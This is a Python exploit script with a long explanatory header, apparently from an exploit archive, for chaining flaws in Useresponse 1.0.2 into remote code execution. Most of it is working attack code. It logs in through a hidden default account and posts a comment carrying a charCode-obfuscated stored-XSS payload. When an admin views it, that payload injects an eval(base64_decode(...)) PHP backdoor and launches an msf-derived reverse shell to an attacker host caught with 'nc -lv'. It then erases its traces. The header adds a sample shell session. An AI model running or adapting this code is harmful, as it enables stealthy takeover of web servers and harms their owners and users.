1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487 | #!/usr/bin/python
# --------------------
# | abuseresponse.py |
# --------------------
# Useresponse <= 1.0.2 privilege escalation & remote code execution exploit
# vendor: USWebStyle (http://www.uswebstyle.com/)
# software: http://www.useresponse.com/
# vulns found by bcoles (@_bclose) and mr_me (@net__ninja)
# exploit by mr_me
# tested environments:
# - Ubuntu 10.10 Lamp stack (MySQL v5.1.61-0/PHP v5.3.3-1)
# - Fedora 12 LAMP stack
#
# Vendor description:
# -------------------
# Our solution focuses on the task to improve company's communication with their customers. We make it easier
# for customers to find answers to their questions, get fast feedback, and have real ability to influence the
# future of the products and services they use.
#
# Explanation:
# ------------
# After pwning the ActiveCollab 'chat module' Stas Kuzma from USWebStyle thought it would be his and his teams best interest
# to have the 'Useresponse' application security 'tested'.
#
# I explained that there is no way I can afford the corporate edition and that I would still be glad to test it if I can recieve a copy
# (for non commerial use dah). A kind email back from Stas and I had full access to the corporate edition of the software package
#
# ... think a bit ... test a bit ... think a bit ... test a bit ... etc
#
# We had a really hard time finding proper exploitable vulnerabilities as halfway through our testing they decided to remove our license :/
# We notified the vendor a few weeks back regarding these bugs so I'm sure they will release a fix soon.
#
# Nonetheless, the path to unauth'ed remote code execution is as follows:
#
# 1. backdoor account that is unable to be deleted by the administrators frontend. Alternatively,
# you can just register an account without admin verification ;)
# 2. privilege escalation via a stored XSS when abusing bbcode parsing
# 3. CSRF against all administrator functionality
# 4. remote code execution by circumventing escape characters and abusing an fwrite()
#
# Somewhat detailed analysis:
# ---------------------------
# Vulnerability 1 - Default backdoor account:
# ```````````````````````````````````````````
# Upon installation we can see that this application installs a default **hidden** user account called 'anonymous'.
# At first I thought this was a practical joke. When I say hidden, I mean there is a boolean flag used in the
# database to mark the account is actually hidden so that you cannot see the account from the administration frontend.
# Additionally, the frontend does not allow an administrator to delete other accounts anyway (wtf!?). o_O
#
# Vulnerability 2 - Privilege escalation via persistant cross site scripting in bbcode:
# `````````````````````````````````````````````````````````````````````````````````````
# The application allows for a low privlidged attacker to embed a malcious JavaScript payload. An adminsitrator viewing
# the page with a standard browser will trigger the embeded JavaScript payload and allow for an attacker to leverage
# the vulnerability to gain administrative access to the application or leverage the vulnerability to target the client
# directly and attack the browser.
#
# The vulnerable code can be found in application/modules/system/templates/system_response_show.phtml on lines 16 & 40:
#
# 13. <h1><?php echo $this->escape($this->activeResponse->title); ?></h1>
# 14. </div>
# 15. <div class="content-object-full">
# 16. <?php echo $this->bbcode($this->activeResponse->content); ?>
# 17. </div>
#
# 39. </div>
# 40. <?php echo $this->bbcode($this->activeResponse->getAnswer()->answer) ?>
# 41. </div>
# 42 </div>
#
# of course, the clientside JavaScript doesnt help at all..
#
# function bbcodeToHtml(text) {
#
# ....
#
# text = text.replace(/\[img\](.*?)\[\/img\]/g, '<img src="$1" />');
# text = text.replace(/\[url=(.*?)](.*?)\[\/url\]/ig, '<a href="$1">$2</a>');
# return text;
# }
#
# function copyTo(body, textArea, n) {
#
# if (n == 1) {
# text = htmlToBbcode(body)
# textArea.val(text);
# } else if (n == 0) {
# text = textArea.val();
# html = bbcodeToHtml(text);
# body.html(html);
# }
# }
#
# Vulnerability 3 - CSRF against all administrator functionality:
# ```````````````````````````````````````````````````````````````
# Well this is straight forward, any of the functionaility an administrator can do can be embeded into a HTML page
# and a link given to a logged in admin. However, for exploitation, it is obviously very convenient to combine this
# issue with the persistant cross site scripting.
#
# Vulnerability 3 - remote code execution by writing php into a file:
# ```````````````````````````````````````````````````````````````````
# This vulnerability exists when attempting to update a module's dictionary. The below PoC request updates the dictionary
# in application/localization/en/thanks.php.
#
# A few things to note:
# - There is a .htaccess file under /application by default that prevents the direct access of any php files
# but this doesnt prevent the code from being executed as the code is included and executed when viewing the edit page.
# - Zend Guard attempts to escape a single quote ' however if you escape the escape (\\'), then you can break out
# of the injected array.
#
# POST /webapps/ur/admin/languages/en/dictionary/thanks/add HTTP/1.1
# Host: localhost
# Cookie: PHPSESSID=d63ib6ec5gakoplbf6tkjlb4s7;
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 553
#
# translation%5BUsers+can+give+praise+to+you%2C+so+all+know+how+customers+are+satisifed+with+provided+quality%5D=
# Users+can+give+praise+to+you%2C+so+all+know+how+customers+are+satisifed+with+provided+quality&translation%5BAll
# +Thanks%5D=All+Thanks&translation%5BSay+thanks%5D=Say+thanks&translation%5BThanks%5D=Thanks&translation%5Bthanks%5D=thanks
# &translation%5BTell+us+kind+words+or+what%27s+on+your+mind%5D=Tell+us+kind+words+or+what%27s+on+your+mind&translation%5B%
# 3Acount+more+thanks%5D=%3Acount+more+thanks&translation%5BThank+you+too%5D=Thank+you+too
#
# lines 221-245 in application/modules/system/controllers/AdminLanguagesController.php show the function that calls addTranslation()
#
# 221. public function editDictionaryAction()
# 222. {
# 223. $this->view->layout()->setLayout('translation');
# 224. $langCode = $this->_getParam('code');
# 225. $moduleName = $this->_getParam('module-name');
# 226. $module = $this->modules->findByName($moduleName);
# 227.
# 228. if (!$module->canEditTranslation($langCode)) {
# 229. $this->view->notify()->error("Dictionary can't be updated!");
# 230. $this->_redirect();
# 231. }
# 232. if ($this->getRequest()->isPost()) { ; must be a post request
# 233. $translation = $this->getRequest()->getParam('translation'); ; get the translation array parameters
# 234. $module->addTranslation($translation, $langCode); ; add the translation
# 235. Singular_Translate::clearCache();
# 236. Singular_Runtime::extract('cachemanager')
# 237. ->getCache('default')
# 238. ->clean(Zend_Cache::CLEANING_MODE_ALL);
# 239. $this->view->notify()->success("Dictionary is updated");
# 240. $this->_redirect();
# 241. }
# 242.
# 243. $this->view->langKey = $module->getLangKey();
# 244. $this->view->translation = $module->getTranslation($langCode);
# 245. }
#
# Unfortunately this is as far as I can go as Zend Guard obfuscates the php when this function resides
# and I dont have unlimited hours.
#
# About this exploit:
# -------------------
# This exploit targets the russian language for less chance of detection as it is enabled by default.
# Other functionality included are:
#
# - HTTP Proxy support for all requests
# - Simple JavaScript obfuscation
# - Simple PHP reverse shell obfuscation (thanks msf)
# - Simple PHP patch to remove the backdoor from the /application/localization/ru/thanks.php file
# - Backdoor injection & execution is triggered by the admin
# - The malicious comment is patched after the exploit is complete
#
# Images for exploitation can be found at http://pastebin.com/MH55NS07 (MD5(urpwned.tar.gz)= b4226779bf4f2bb3c720fe94fd4afb4e).
#
# mr_me@gliese:~$ wget http://pastebin.com/raw.php?i=MH55NS07 -O urpwned.txt
# mr_me@gliese:~$ dos2unix -ascii urpwned.txt
# mr_me@gliese:~$ cat urpwn.txt | base64 -d > urpwned.tar.gz
# mr_me@gliese:~$ openssl md5 urpwned.tar.gz
# MD5(urpwn.tar.gz)= b4226779bf4f2bb3c720fe94fd4afb4e
# mr_me@gliese:~$ tar -zxvf urpwned.tar.gz
# urpwned/
# urpwned/1.png
# urpwned/2.png
#
# Example usage:
# --------------
# mr_me@vuln-web-server:~$ ./abuseresponse.py -p localhost:8080 -r localhost -d /webapps/ur/ -c 127.0.0.1:5555
#
# | -------------------------------------------------------------------------- |
# | Useresponse <= 1.0.2 privilege escalation & remote code execution explo!t |
# | found & exploited by: bcoles & mr_me --------------------------------------|
#
# (+) Testing proxy @ localhost:8080.. proxy is found to be working!
# (+) Logging into the target application...
# (+) Login successful!
# (+) Installing backdoor JavaScript...
# (+) Backdoor JavaScript installed!
# (+) Listening on port 5555 for the victim admin...
# Connection from 127.0.0.1 port 5555 [tcp/*] accepted
# id;uname -a
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# Linux vuln-web-server 2.6.35-32-generic #67-Ubuntu SMP Mon Mar 5 19:35:26 UTC 2012 i686 GNU/Linux
# pwd
# /var/www/webapps/ur
# cat application/localization/ru/thanks.php
# <?php
# return array('Thank you too' => '\\')."{${eval(base64_decode($_REQUEST[lulz]))}}".("rce"//',
# );
# exit
# (+) Cleaned backdoor php code!
# (+) Cleaning up JavaScript...
# (+) JavaScript cleanup complete!
# mr_me@vuln-web-server:~$ cat /var/www/webapps/ur/application/localization/ru/thanks.php
# <?php
# return array('Thank you too' => 'thanks',
# );
# ############################################################################################################
import sys
import urllib
import urllib2
import socket
import re
from optparse import OptionParser
from base64 import b64encode
from cookielib import CookieJar
from os import system
usage = "./%prog [<options>] -r [target] -d [directory]"
usage += "\nExample: ./%prog -p 127.0.0.1:8080 -r target.com -d /webapps/ur/ -c 127.0.0.1:1337"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
help="HTTP proxy <server:port>")
parser.add_option("-r", type="string", action="store", dest="target",
help="The remote server <server:port>")
parser.add_option("-d", type="string", action="store", dest="target_path",
help="Directory path to userresponse")
parser.add_option("-c", type="string", action="store", dest="cb_server",
help="The connectback server <ip:port>")
(options, args) = parser.parse_args()
def banner():
print("\n\t| -------------------------------------------------------------------------- |")
print("\t| Useresponse <= 1.0.2 privilege escalation & remote code execution explo!t |")
print("\t| found & exploited by: bcoles & mr_me --------------------------------------|\n")
# validate that the poxy works
def test_proxy():
check = 1
sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))
sys.stdout.flush()
try:
req = urllib2.Request("http://www.google.com/")
req.set_proxy(options.proxy,"http")
check = urllib2.urlopen(req)
except:
check = 0
pass
if check != 0:
sys.stdout.write("proxy is found to be working!\n")
sys.stdout.flush()
else:
sys.stdout.write("proxy failed, exiting..\n")
sys.exit(0)
# build the reverse php shell
# msf code + some more stealth modifications
def build_php_code(cb_server,cb_port):
phpkode = ("""
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
phpkode += ("""$dis=@ini_get('disable_functions');""")
phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
phpkode += ("""$nofuncs='no exec functions'; """)
phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
phpkode += ("""$s=@fsockopen('tcp://%s','%s');while($c=fread($s,2048)){$out = ''; """ % (cb_server, cb_port))
phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%s'); """ % (cb_server, cb_port))
phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
phpkode += ("""}@socket_close($s);} """)
phpkode += ("""$pfile = getcwd()."/application/localization/ru/thanks.php"; """)
phpkode += ("""$patchdata = "<?php \\nreturn array('Thank you too' => 'thanks',\\n);\\n"; """)
phpkode += ("""$fh = fopen($pfile, 'w');fwrite($fh, $patchdata);fclose($fh);""")
return phpkode
# build malcious JavaScript string
def build_js(phpkode):
attackstring = ('\\\\\').\"{${eval(base64_decode($_REQUEST[lulz]))}}".("rce"//')
maliciousjs = ""
for char in attackstring:
maliciousjs += "%s," % str(ord(char))
bdjs = ("""var j = String.fromCharCode(%s); """ % (maliciousjs[:-1]))
bdjs += ("""document.write('<iframe name=\\\'f\\\' style=\\\'display:none;height:1px;width:1px\\\'></iframe>""")
bdjs += ("""<form name=\\\'l\\\' action=\\\'http://%s%sadmin/languages/ru/dictionary/thanks/edit\\\' method=\\\'post\\\' """
% (options.target, options.target_path))
bdjs += ("""target=\\\'f\\\'><input type=\\\'hidden\\\' name=\\\'translation[Thank you too]\\\' value='+j+' /></form>""")
bdjs += ("""<iframe name=\\\'rce\\\' src=\\\'http://%s%sadmin/languages/ru/dictionary/thanks/edit?lulz=%s\\\' """
% (options.target, options.target_path, b64encode(phpkode).rstrip()))
bdjs += ("""style=\\\'display:none;height:1px;width:1px\\\'></iframe>'); document.l.submit()""")
maliciousjs = ""
for char in bdjs:
maliciousjs += "%s," % str(ord(char))
maliciousxss = "[img]a\" onerror=\"eval(String.fromCharCode(%s))[/img]" % (maliciousjs[:-1])
return maliciousxss
# get the list of local system IP addresses
def get_ip_addresses():
addrList = socket.getaddrinfo(socket.gethostname(), None)
ipList=[]
for item in addrList:
ipList.append(item[4][0])
ipList.append('127.0.0.1')
return ipList
# the initial login request, set the proxy and cookie jar
def login_request(req, values):
data = urllib.urlencode(values)
user_agent = 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0'
headers = { "X-Requested-With" : "XMLHttpRequest", "User-Agent" : user_agent }
cj = CookieJar()
if options.proxy:
proxy = urllib2.ProxyHandler({'http': options.proxy})
opener = urllib2.build_opener(proxy, urllib2.HTTPCookieProcessor(cj))
elif not options.proxy:
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
# install the opener for future requests
urllib2.install_opener(opener)
req = urllib2.Request(req, data, headers)
try:
result = urllib2.urlopen(req)
except urllib2.HTTPError, e:
print("(-) Error: the target server returned an invalid status code: %s" % e.code)
sys.exit(0)
except urllib2.URLError, e:
print("(-) Error: login failed against the target server and returned: %s" % e.reason)
sys.exit(0)
return result
# post requests
def do_post(req, values):
user_agent = 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0'
headers = { "X-Requested-With" : "XMLHttpRequest", "User-Agent" : user_agent }
data = urllib.urlencode(values)
req = urllib2.Request(req, data, headers)
try:
result = urllib2.urlopen(req)
except urllib2.HTTPError, e:
print("(-) Error: the target server returned an invalid status code: %s" % e.code)
sys.exit(0)
except urllib2.URLError, e:
print("(-) Error: post request failed against the target server and returned: %s" % e.reason)
sys.exit(0)
return result
def main():
# check to ensure we have the target set and the local listener ready
if len(sys.argv) <= 6 or not options.cb_server or not options.target:
banner()
parser.print_help()
sys.exit(0)
# for the anonymous email address
try:
target = socket.gethostbyaddr(options.target)[1][0]
except:
print("(-) Cannot resolve the target server")
sys.exit(0)
# the backdoor account, change if needed
username = "anonymous@%s" % (target)
password = "password"
# error handling
try:
cb_server = options.cb_server.split(":")[0]
cb_port = options.cb_server.split(":")[1]
socket.inet_aton(cb_server)
except socket.error:
print("(-) The connectback server is either not in format <ip:port> or not a valid ip address")
sys.exit(0)
# tidy up the targets URI path if it isnt set correct
if options.target_path != "/":
if options.target_path[:1] != "/":
options.target_path = "/%s" % (options.target_path)
if options.target_path.rstrip()[-1] != "/":
options.target_path = "%s/" % (options.target_path)
# go get the reverse php shell
phpkode = build_php_code(cb_server,cb_port)
# build comment and the js based on the php code
m_comment = ("Interesting idea! but I think you should review you code better and ensure")
m_comment += (" that is in fact, secure.%s" % (build_js(phpkode)))
# login
url = ("http://%s%slogin" % (options.target, options.target_path))
values = {"email":username, "password":password, "is_remember":"0", "submit":"Login", "redirect":"reset"}
banner()
if options.proxy:
test_proxy()
print("(+) Logging into the target application...")
loginbody = login_request(url, values).read()
if re.search("response_type\":\"success", loginbody):
print("(+) Login successful!")
print("(+) Installing backdoor JavaScript...")
# adding the malcious JavaScript comment
values = {"response_id":"1", "content":m_comment, "is_private":"0", "file[0]":"", "filename[1]":"", "vote":"0"}
commentbody = do_post("http://%s%scomments/add" % (options.target, options.target_path), values)
commentre = re.compile(r'input type=\\"hidden\\" name=\\"comment_id\\" value=\\"(.*)\\" id=\\"comment_id')
commentid = commentre.search(commentbody.read())
if commentid:
print("(+) Backdoor JavaScript installed!")
print("(+) Listening on port %s for the victim admin..." % cb_port)
# we wait for the admin, upon JS execution, shell
if cb_server in get_ip_addresses():
try:
system("nc -lv %s" % cb_port)
except:
print("(!) You do not have privileges to execute a bind shell on port %s" % cb_port)
print("(!) Choose a different port or run the exploit with higher privileges")
sys.exit(0)
elif cb_server not in get_ip_addresses():
print("(!) This host is not the connect back server")
print("(!) You will need to execute 'nc -lv[p] %s' on %s" % (cb_port, cb_server))
sys.exit(0)
print("(+) Cleaned backdoor php code!")
print("(+) Cleaning up JavaScript...")
# no timeout on the session and we edit the comment to cleanup because we dont have delete privileges
cleanupurl = ("http://%s%scomments/edit" % (options.target, options.target_path))
values = {"response_id":"1", "content":"interesting idea!", "file[0]":"0",
"filename[1]":"", "comment_id":commentid.group(1)}
cleanupres = do_post(cleanupurl, values).read()
if re.search("response_type\":\"success", cleanupres):
print("(+) JavaScript cleanup complete!")
elif not re.search("response_type\":\"success", cleanupres):
print("(-) Failed to cleanup JavaScript.. login manually to repair the application.")
sys.exit(0)
elif not commentid:
print("(-) Failed to install the backdoor JavaScript...")
print("(!) Looks like you have to pwn your target manually!")
sys.exit(0)
elif not re.search("response_type\":\"success", loginbody):
print("(-) Login unsuccessful, check your credentials...")
print("(-) Maybe the anonymous account is disabled?")
sys.exit(0)
if __name__ == "__main__":
main()
# 00101110 00101110 00101110 01111001
# 01101111 01110101 00100000 01100011
# 01100001 01101110 01110100 00100000
# 01110011 01110100 01101111 01110000
# 00100000 01110101 01110011 00101110
|
